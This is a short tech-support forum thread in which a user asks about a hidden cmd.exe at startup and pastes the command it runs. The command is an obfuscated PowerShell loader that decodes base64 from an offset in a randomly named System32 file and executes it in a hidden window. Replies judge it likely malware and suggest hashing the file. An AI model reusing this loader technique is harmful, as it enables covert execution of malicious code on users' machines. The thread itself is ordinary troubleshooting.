Unknown CMD file running

[Clintos]

Hi guys, I have a cmd.exe that is always on when I start my computer. I can't find anything in task scheduler or autorun (to check up startup items) that opens it.

 

cmd.exe /c echo iex "`$b=[IO.File]::ReadAllBytes('C:\WINDOWS\System32\5fcxiwjk.cqe');`$s=[Text.Encoding]::UTF8.GetString(`$b, 444771, 1200);Invoke-Command -ScriptBlock ([ScriptBlock]::Create([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(`$s))))" | powershell.exe -WindowStyle Hidden

 

This is what i get from process explorer from it. Does anyone know what this could be or where it could be from? I've run malwarebyte and it's come up clean.

 

Cheers

[0x0luke]

Do you have the SHA256 or MD5 hash of the 5fc file, or even a copy of the contents?

 

I have a feeling this is some sort of ware, but it wouldn't surprise me if its some garbage your motherboard manufacture has installed if you're using any of their software

[Kilrah]

Very likely malware with a filename like that and being deobfuscated before being passed to powershell.

[Clintos]

Windows 10, I've got rid of that file and the scripts are gone. I've run malwarebytes/windows defender. Is there anything else i can run to sweep my computer?